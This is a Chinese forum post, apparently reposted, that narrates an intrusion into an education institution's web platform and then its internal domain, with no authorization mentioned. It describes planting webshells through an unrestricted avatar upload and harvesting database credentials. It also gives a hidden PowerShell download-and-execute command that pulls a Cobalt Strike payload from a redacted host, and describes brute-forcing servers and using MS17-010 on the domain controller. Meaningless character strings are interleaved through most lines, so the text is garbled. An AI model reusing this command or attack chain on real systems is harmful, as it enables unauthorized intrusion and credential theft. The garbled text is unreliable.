|
- Q" l i; p/ t8 q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路8 g/ C* q3 e, M: ]8 {: }
' @7 i5 L. r1 u% X# E( p
; i1 X# w5 R, h4 e / W* V$ q1 ~& A) ]
$ x, U" ?; p: f0 W$ p4 \! L
/ ^7 i" |0 f) `7 |8 D
正文
' S5 V3 V" d V. ^+ j! a; u6 G; {" t
- j& U! A) m* ]9 o, a5 E& T. D
2 y4 \# ~6 N8 Q* \ " L% J2 T" i3 Q" G+ n* |
0 i+ A) U7 T0 K' a8 F: R$ i( S' k
( ?& W" S2 s6 j! V! R. n 目标:www.xxxx.com(一家教育机构)
& ]! p7 w7 D% F2 B打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
. u+ R/ i4 w$ X U$ w, d9 f* S* h
9 a% Z% \! h' f" P) V+ c& A0 g2 y( q0 T9 U. B& R/ O
 ( h; L. s- e0 F" {
H9 k I% V" o8 {. I3 n1 i+ \3 A( i9 W: `5 f, J
进行了简单的信息搜集
$ w. E! _4 a0 a: h# a1 E
$ e, o5 ]( ]( w- i( Z
/ q- `7 w8 M! n
0 x( |7 X* n; c' X) a
- Q7 w1 S+ s! }% m) P 子域名搜集8 _* f& w/ h x J2 ~
# A# z% j) R5 R9 _& G+ ]# S9 Q
) I3 p$ H8 {1 s 
3 I0 p0 v0 h8 b
8 l c' h7 N* `) R" [7 n
" S1 r9 U l p! e, y3 u' C fofa找资产
: V$ i* X. k7 _1 ]
- O( D" d @6 ~4 g5 h3 `0 @1 d3 k( n
- A! n$ f. Q' m. F$ \
: t( G' Y! D4 t  ' d; N: K0 w+ u! J! F/ b
1 a* X( L- ~6 _+ Y5 F! J, Y. O2 N" X7 J/ X( u ?
一共七个资产。去重之后只有两个。
: p9 f7 _2 M" O' d, s& d' ?
9 c& n! d* g% k/ u L: x
2 b1 u( G$ E6 c
: X2 F/ l w# J: l
9 B+ O J0 H5 r' P0 H 目录探测: d1 u1 W h4 |
( |7 Q/ ?. A+ [2 @. ]; ], N! O# J2 c& P! p
3 g1 \" }" @& f, A; Z7 ^ ! ~* i$ x1 y ?' V3 y7 a: _
# q- |9 ?3 Z4 k
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 T* n5 c) O3 b: }3 E
' W7 U1 w/ z2 S7 Q6 f [) X/ W" X o
* ~9 p% L, }% B : |3 [: U: r4 Y* F! x! L
4 q2 V" y6 y/ Z/ v: X# ?
我又尝试了通过修改返回包来绕过登录界面
3 b. f3 j; g- ^4 J! m7 B4 s: V
$ m6 z5 N3 U2 s. O. e, B) f: k: Y$ k. z4 _. d0 {+ e4 q
( B3 Z, g. ?5 t 6 m) x4 ]8 w8 v
$ n" a1 G! ~ ]% ^6 P$ k' H1 o
还是不行,尝试注入无果. Y" L- L0 q- y+ h, n: K* A/ x
3 D5 y1 V+ m' ]5 ~4 n
% L* e1 U* n! t) a! N! w 
! C; \$ n. a7 [. G# y. s$ Y $ n: W8 }& K' V( c# k
! E- C& W: B2 ^$ [3 {" @" z" C
不过我目录探测出了一处Spring信息泄露
! V6 ~7 F4 W; ~! I
l+ h3 D0 v! E: B: J! [
8 y4 s2 {' J Y- p
4 J/ T) `( J; I' b+ J
* I% {7 R" ?7 m! M# C( Z  I8 F0 O. f5 h8 i# E/ S- d. O! \
9 w9 t! o" B5 |7 l, l6 m# S( k
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录9 M$ L% R& B/ W5 ^# ]* e7 k9 u
! L' E6 M, P u# |
8 s1 C8 m) r9 _' O1 q2 l
. ?- v8 `, `' E* m6 H 4 n+ N u& [: {( O* H
. j3 f% O' T+ ?; L' Q 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
/ m; p2 o' `5 V7 j& C # N; N' ]& |; o- L0 r7 `" k
6 @) F0 l% r: |* P4 a! a# c
 # o9 c3 D+ l$ o
; t" L. x' a2 P1 S/ I, q& {# y5 Q
; {! I2 m" w& S 获取有些师傅到这一步就手机抓包电脑测了。% v% c- [- `: U, P# ]
5 D' I2 _! ? n; @2 s: w2 r0 K: Z- E. s3 o' H' d+ `
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
3 r" l4 k6 X$ {1 m8 w( o / }. s/ D& ~. k! E
: ^6 m# K# S/ F' U3 ~& r7 W
其中在一个公众号发现了小程序,可以进行注册。
0 u! R, c5 b& x& q9 o% D7 c: e& I
" ?% g1 o: I, @2 f3 R Y3 o& |+ z7 }9 Q( G. T; S
看到了头像上传,尝试上传获取WebShell
- ^2 j3 T; R2 B% s# l- H
9 u: O) f) x7 |4 w* i+ J
! Q* @0 k( f. @; g 
7 u8 T t4 G1 O6 n* N9 A$ B$ H3 b 1 }' Z; Y: a# M4 Y4 F
7 n' T. R7 r5 a$ i7 ^ ? 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
! {# q. u- b4 n8 Z# o' R
$ P6 J3 f2 \, k, `; t9 `& N0 F! w6 K7 p) {3 s6 E) g% ]
# V9 y$ e% o s: z ) r h: Q3 t* B: j" D
+ t" F: x# j" X0 n0 E( ?2 x' o 然后上了大马
w4 B, [2 A) L8 @, u 2 ^' d/ h/ \, n+ p- s
2 ]$ {! c+ H) `; ^: ~4 _
% z* g* [, D6 z6 S: y: I; q
# Q, Q5 m% G m" X5 M) c) `# V+ L+ B, J+ v
 " t _" C8 ^- O) }; ^
3 U& Y J9 i7 T' C2 }
% i* o4 G& s5 d+ e4 \' h0 N
通过翻找文件发现数据库账号密码# a, V& ?- c9 V- o. H$ g
: Z; T2 S2 s4 o
' c% x' F. `. k- T1 \3 q! N8 j  ; E0 W" U4 F9 k. W2 ]5 I4 C
; V4 N3 Y' L5 K
0 e. ^0 Q/ o3 b! u --内网渗透2 t+ o3 [; R- `5 x6 R5 \
6 |, ~! H. R/ c/ ~$ x! D
- q( z" u+ y4 e7 T# D) q 直接通过powershell执行 cs上线3 I+ S; s% B( w
9 \2 E5 K/ T1 O9 @" O; q( j- o8 R1 M9 t {, D$ O; {* h8 ^- X
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
$ L3 P% I9 H! r
! F0 U1 V4 Y4 N
8 S$ V. w9 m+ P; P, ]+ m5 r p 
$ ?# r- p2 ^/ I ; N! m" g5 ?& m; C3 {) v+ l+ w
) c3 D+ W9 \) r3 ]- F/ o
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破! L1 t' N. W/ A% p, V
' k, f9 Y# X) n
8 U. r" a2 h8 D  & P! n7 E4 r) I
$ r4 O: e0 V5 T* t
( v5 V" C1 X: y6 E8 z7 U+ x2 d
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 F% _+ u7 Z- |) G6 G/ H* z
9 ]. q( W2 @/ T7 d2 v
9 X, I d' Y$ J2 ]6 _/ H
- ^, |" c0 k6 h# q ) E$ A* C E8 G# M
) l0 a) v, d' O- Y
, v9 \4 h, Y8 z5 e. Q , i! s7 W$ H% h# ?
5 ~7 t$ i/ Q( y+ @ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' y- E5 w& U" }9 a e; X# K
- n* z' E' y/ }
9 j& k- W1 s" ?8 d& G9 e ) r6 d. w- \& }7 x; y) e
8 F) }; f! {6 c# k" Q: i6 L 
! C. c8 j2 F( }+ f
9 @9 o& @4 I \# J+ r( M- n+ ?/ S0 s0 l9 [
5 A3 A" d+ w% W! H
' O* {" a9 u& X( z: S5 S8 Z \$ S: \5 U! i. x* y% J4 }
# U- f1 A4 g3 {6 q# V9 c# s
8 D& K+ T/ U) S- ~$ Z
, _; ?; T- ] J4 s( @! J+ j 3 J/ a; N: g# \9 [& h h
" P; f+ }, ~/ q1 M! E/ c! C
小结
& z( v3 Q, f2 E) ] % Q! Q! y# S2 e! C& @8 z% m
( b" W& q- K$ O
* Y4 G2 r( `+ Q& w
3 }2 f' b1 ]1 x' s; ^! a# }2 f. c
- ]; l: I; `9 y2 c0 ]( ?1 z 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
8 L9 R& ^; R' B' P
& S( w+ P4 s, u
, z. C- [. C- u! |+ z. {
& Y8 W4 g" l& b! z; [
, L+ |7 h% a9 B$ {
! Q9 |9 {" w, t N- I1 V& h0 o -
" R; R& d8 N1 Y( A' ~" `
) T9 e+ B) X- i6 @
8 K i% T: L& w2 j# N" R% ]
-
8 B2 L. h: }# r( i% _
3 j: r$ o4 O" h
# z+ ?( v5 |' H4 I! A
2 e; a( n B1 X) N$ L* E: l4 i7 ?; r: r% Q9 [+ E+ ?/ D
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 r- D. y9 u9 K" B$ u
. g: K! z+ L& a B/ b- [5 K5 U
# Q0 j/ ` L8 a0 p G
7 W6 p* L* K% W B/ _) J# t | 
发表于 2024-3-1 19:41:32
收藏
支持
反对